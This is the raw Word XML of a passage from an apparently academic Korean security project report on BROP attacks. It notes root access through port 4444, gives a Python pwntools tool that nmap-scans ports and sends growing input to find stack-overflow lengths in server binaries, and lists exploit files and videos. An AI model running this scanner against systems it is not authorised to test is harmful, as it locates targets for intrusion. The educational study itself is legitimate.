          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">포트가 여러 개 열려있는 것을 확인할 수 있고 이를 이용하여 외부로부터 </w:t>
      </w:r>
      <w:r>
        <w:t>4444</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">포트로 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">root </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>계정으로 접속을 시도할 수 있음을 확인하였다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ABE889C" w14:textId="77777777" w:rsidR="004A7AE9" w:rsidRDefault="004A7AE9">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A5093A" w14:textId="01EA295E" w:rsidR="004A7AE9" w:rsidRDefault="004A7AE9" w:rsidP="004A7AE9">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:ind w:left="1000" w:hanging="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:t>ROP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">에 취약한 </w:t>
      </w:r>
      <w:r>
        <w:t>server binary</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">를 발견하는 </w:t>
      </w:r>
      <w:r>
        <w:t>tool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F41B226" w14:textId="16356491" w:rsidR="004A7AE9" w:rsidRDefault="004A7AE9" w:rsidP="004A7AE9">
      <w:r>
        <w:t>Brop</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>의 특성을 활용하여 먼저 포트 스캐닝을 진행하고,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> well_known_port, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">여기서는 </w:t>
      </w:r>
      <w:r>
        <w:t>1023</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>으로 설정하였다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="195FD590" w14:textId="62356BF1" w:rsidR="004A7AE9" w:rsidRPr="004A7AE9" w:rsidRDefault="004A7AE9" w:rsidP="004A7AE9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>이외의 포트에 대화형 데몬인지를 확인하고,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>대화형 데몬이라면 지속적으로 0</w:t>
      </w:r>
      <w:r>
        <w:t>x1000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">까지 </w:t>
      </w:r>
      <w:r>
        <w:t>overflow checking</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>을 진행하여 E</w:t>
      </w:r>
      <w:r>
        <w:t>OFError</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>가 발생한다면 B</w:t>
      </w:r>
      <w:r>
        <w:t>ROP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">에 취약한 바이너리로 자동으로 선별할 수 있는 </w:t>
      </w:r>
      <w:r>
        <w:t>tool</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>을 제작하였다.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AE9" w14:paraId="0191B17C" w14:textId="77777777" w:rsidTr="004A7AE9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9016" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="75FDF23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#! /usr/bin/python3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A41B5B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35E42A6F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from pwn import *</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D3CA3B8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from subprocess import *</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A61709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import sys</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3728DA7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35512AD8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WELL_KNOWN_PORT_BOUNDARY = 1023</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05E57BBC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SERVER = 'localhost'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4FC897E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BASE_STRING = 'game\n'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D78C3D3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7CFD4AFE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ports = []</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C32EE35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68E92B83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argc = len(sys.argv)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54372CA3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if argc &lt; 3:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63B8403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print('-s: server address')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E8406AC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print('e.g: ./tool.py -s \'localhost\'')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A00D106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exit(1)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C5F932C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699DB71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SERVER = sys.argv[2]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62866285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587E6EBE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 = Popen(["sudo", "nmap", "-sS", "localhost"], stdout=PIPE)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="056B547B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 = p.stdout.read()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0194A3E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3E61087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# parsing outpiut</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B8DDF59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7CBE27C7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start = r.decode().find('STATE SERVICE\n') + len('STATE_SERVICE')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2609045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r = r[start:]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42F7573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25D8BC6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while True:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06BFBD5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i1 = r.decode().find('\n')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04CE8B5F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i2 = r.decode().find('/tcp')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02C55ECF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68D2CD8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if i1 == -1 or i2 == -1:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A23222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break</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30E179C0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port = int(r[i1+len('\n'):i2])</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="550876EB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if port &gt; WELL_KNOWN_PORT_BOUNDARY:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40C6E9BE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ports.append(port)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A01E5BB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25D70A4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r = r[i2 + len('/tcp'):]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="45B138D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3ADEE9D9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print(ports)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14BDFDD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57BF793E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def pre_step(s):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="679B277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pass</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46453E25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696DE356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def find_overflow(port):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37B7488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for i in range(1, 0x1000):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D669800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s = connect(SERVER, port, level='error') # connect to server</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33E1DE8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try:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B222F5D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pre_step(s)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="697FF293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# send 'a' repeatedly increasing 1 to find overflow point</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C89F1E7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s.sendline('a'*i)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="03121878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d = s.recvuntil('\n', timeout=1)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68415649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d = s.recv(timeout=0.5)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D980C2F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# if we got a EOFError, that's a overflow point, print and close the connection</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D183380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except EOFError:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="647C99D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log.info('overflow length: {}'.format(i-1))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B263C2D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s.close()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24DF3BE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 return i-1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2308DCB0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s.close()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26071D63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return 0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79FF2372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</w:p>
          <w:p w14:paraId="4BFFCD5E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for port in ports:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F7659DA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s = connect(SERVER, port)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A61DDB4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data = s.recv()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4783369B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if data:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0FD2A796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s.close()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F73DFB7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over_len = find_overflow(port)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B5A2820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if over_len:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0CC239C1" w14:textId="77777777" w:rsid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        log.info('port {} is vulnerable for overflow ( especially brop attack )'.format(port))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="200F2F2E" w14:textId="19BFF061" w:rsidR="004A7AE9" w:rsidRPr="004A7AE9" w:rsidRDefault="004A7AE9" w:rsidP="004A7AE9">
            <w:pPr>
              <w:pStyle w:val="a3"/>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF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   s.close()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1689F3FF" w14:textId="06BE0E5D" w:rsidR="004A7AE9" w:rsidRDefault="004A7AE9" w:rsidP="004A7AE9"/>
    <w:p w14:paraId="4439BA63" w14:textId="6A2D6E7E" w:rsidR="00092C17" w:rsidRDefault="00092C17" w:rsidP="004A7AE9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">테스트로 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">10001, 10002, 10003 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>포트에 바이너리를 대화형으로 실행시킨 후,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>툴을 작동하여 결과를 확인해보았다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF4CCBC" w14:textId="295F36E5" w:rsidR="00092C17" w:rsidRDefault="00092C17" w:rsidP="004A7AE9"/>
    <w:p w14:paraId="44C9A690" w14:textId="0A23C7D7" w:rsidR="00092C17" w:rsidRDefault="00092C17" w:rsidP="004A7AE9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">0001 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">포트의 경우 앞서 </w:t>
      </w:r>
      <w:r>
        <w:t>exploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">을 진행한 </w:t>
      </w:r>
      <w:r>
        <w:t>brop</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">에 취약한 </w:t>
      </w:r>
      <w:r>
        <w:t>binary</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>이며,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 10002</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">번 포트는 취약점이 존재하지 않는 </w:t>
      </w:r>
      <w:r>
        <w:t>binary, 10003</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">번 포트는 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">stack overflow </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>취약점이 존재하는 대화형 바이너리이다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="246AEA61" w14:textId="1998C84B" w:rsidR="00092C17" w:rsidRDefault="00092C17" w:rsidP="004A7AE9">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6DCDDC66" wp14:editId="5B23C80A">
            <wp:extent cx="5731510" cy="2526030"/>
            <wp:effectExtent l="0" t="0" r="2540" b="7620"/>
            <wp:docPr id="6146" name="Picture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05BFDC1-3BB1-4443-ADF7-BE8C4068D9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05BFDC1-3BB1-4443-ADF7-BE8C4068D942}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8B4F9" w14:textId="77777777" w:rsidR="00092C17" w:rsidRDefault="00092C17">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="448896D8" w14:textId="77777777" w:rsidR="00092C17" w:rsidRDefault="00092C17" w:rsidP="00092C17">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:ind w:left="1000" w:hanging="400"/>
      </w:pPr>
      <w:r w:rsidRPr="00FA4C7E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>파일 구성</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="470FBC01" w14:textId="15B2F193" w:rsidR="00092C17" w:rsidRDefault="00092C17" w:rsidP="00092C17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Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CEA42F0" w14:textId="174E8C12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Brop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B604709" w14:textId="63DF4698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Exploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">을 진행한 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>brop</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>에 취약한 b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>inary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1B8CF1" w14:textId="4A9BCD38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ex.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="561CCC3D" w14:textId="287DADE8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rop binary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exploit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>python code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59CCFB2C" w14:textId="07A42F5B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un.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B96C62" w14:textId="2339CEFC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rop binary</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">를 대화형 데몬으로 실행시키는 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>shell script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="387F4FFD" w14:textId="7BC66166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un2.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04938DAE" w14:textId="6A65C3EA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test binary</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">를 대화형 데몬으로 실행시키는 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>shell script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F0A1E1" w14:textId="429877B3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un3.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E34E3BE" w14:textId="69188CB2" w:rsidR="00092C17" w:rsidRP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test2 binary</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">를 대화형 데몬으로 실행시키는 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>shell script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC9FB0C" w14:textId="6DDA7CE0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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F59302" w14:textId="37B9579C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test binary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21373826" w14:textId="5C62D12A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est.c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55FF1BC3" w14:textId="0CD05C6B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 binary source</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE224D0" w14:textId="30761AB6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est2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DEB878B" w14:textId="7A702AA7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est2 binary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23094784" w14:textId="3C212F2C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est2.c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601B710A" w14:textId="2D8589A1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est2 binary source</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18682AF5" w14:textId="76FDA4CD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ool.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA838F7" w14:textId="63D8CB2C" w:rsidR="00092C17" w:rsidRP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BROP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">에 취약한 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>server binary</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">를 발견하는 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41AC3C8B" w14:textId="0EF733F9" w:rsidR="00092C17" w:rsidRDefault="00092C17" w:rsidP="00092C17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Ppt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C919AE5" w14:textId="1969EE06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발표에 사용될 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ppt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079B7398" w14:textId="0FDD137B" w:rsidR="00092C17" w:rsidRDefault="00092C17" w:rsidP="00092C17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Report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F410B1C" w14:textId="1F85D00B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보고서</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71AE528D" w14:textId="54168DE9" w:rsidR="00092C17" w:rsidRDefault="00092C17" w:rsidP="00092C17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Video</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E72F2DD" w14:textId="19EAD1A0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Exploit1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6078A9E2" w14:textId="32D50538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 xml:space="preserve">Exploit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">과정을 담은 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>video</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132AF986" w14:textId="147A4E47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Exploit2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3319C938" w14:textId="26655E99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Exploit1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>에 이어 e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">xploit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">과정을 담은 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>video</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6118E0F7" w14:textId="05F2523C" w:rsidR="00092C17" w:rsidRDefault="00092C17" w:rsidP="00092C17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Tool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05DC15B0" w14:textId="08955CBC" w:rsidR="00092C17" w:rsidRDefault="00092C17" w:rsidP="00092C17">
      <w:pPr>
        <w:pStyle w:val="a7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툴 사용 과정을 담은 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>video</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E25BB74" w14:textId="72AD6E17" w:rsidR="00092C17" w:rsidRPr="00092C17" w:rsidRDefault="00092C17" w:rsidP="00092C1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7A1DE3D" w14:textId="77777777" w:rsidR="00092C17" w:rsidRDefault="00092C17" w:rsidP="00092C17">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:ind w:left="1000" w:hanging="400"/>
      </w:pPr>
      <w:r w:rsidRPr="00FA4C7E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>유지보수</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D79D1C" w14:textId="4EF08EC8" w:rsidR="00092C17" w:rsidRDefault="00092C17" w:rsidP="00092C17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rop</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">만을 탐지하는 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tool</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>이 아닌,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ymbolic execution</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 및 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>dynamic instrumentation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">을 사용하여 프로그램의 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>routine</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">을 자동으로 분석하고 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pre_step </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">필요 없이 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>entry point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target function</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">으로 지정하여 더욱 빠르고 정확하게 분석할 수 있도록 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">fuzzer </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>형태로 발전시켜 나갈 것이다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0676E0C0" w14:textId="77777777" w:rsidR="004A7AE9" w:rsidRPr="00092C17" w:rsidRDefault="004A7AE9" w:rsidP="004A7AE9"/>
    <w:sectPr w:rsidR="004A7AE9" w:rsidRPr="00092C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E414A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0409001D"/>
    <w:numStyleLink w:val="2"/>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="28DB111E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8CF1BE2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41906267"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0A70A72A"/>
    <w:lvl w:ilvl="0" w:tplc="35A0B5F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4B6A54"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E0104E8C"/>
    <w:lvl w:ilvl="0" w:tplc="3DAEC638">
      <w:start w:val="19"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="76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0AE612D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3A7AAB54"/>
    <w:lvl w:ilvl="0" w:tplc="047A2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3E1FDF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0409001D"/>
    <w:numStyleLink w:val="1"/>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="5C403A7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F285CC6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0409001D"/>
    <w:numStyleLink w:val="10"/>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="9" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="65036B17"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5756F39A"/>
    <w:lvl w:ilvl="0" w:tplc="4A7275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F5B"/>
    <w:rsid w:val="00092C17"/>
    <w:rsid w:val="000A7E3A"/>
    <w:rsid w:val="002145E3"/>
    <w:rsid w:val="002346CF"/>
    <w:rsid w:val="00260F5B"/>
    <w:rsid w:val="002754C1"/>
    <w:rsid w:val="004A7AE9"/>
    <w:rsid w:val="006B77A1"/>
    <w:rsid w:val="00D02C90"/>
    <w:rsid w:val="00E77BE2"/>
    <w:rsid w:val="00EB3CD6"/>
    <w:rsid w:val="00FA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2FA31"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{24A300B0-E6F6-436A-B1D5-9FADFF16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E77BE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FA4C7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E3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60F5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214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E77BE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E77B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E77BE2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E77BE2"/>
    <w:rPr>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a7">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="34"/>
    <w:rsid w:val="00E77BE2"/>
    <w:pPr>
      <w:ind w:leftChars="400" w:left="800"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="1Char">
    <w:name w:val="제목 1 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="11"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00E77BE2"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="1">
    <w:name w:val="스타일1"/>
    <w:basedOn w:val="a2"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00E77BE2"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="2"/>
      </w:numPr>
    </w:pPr>
  </w:style>
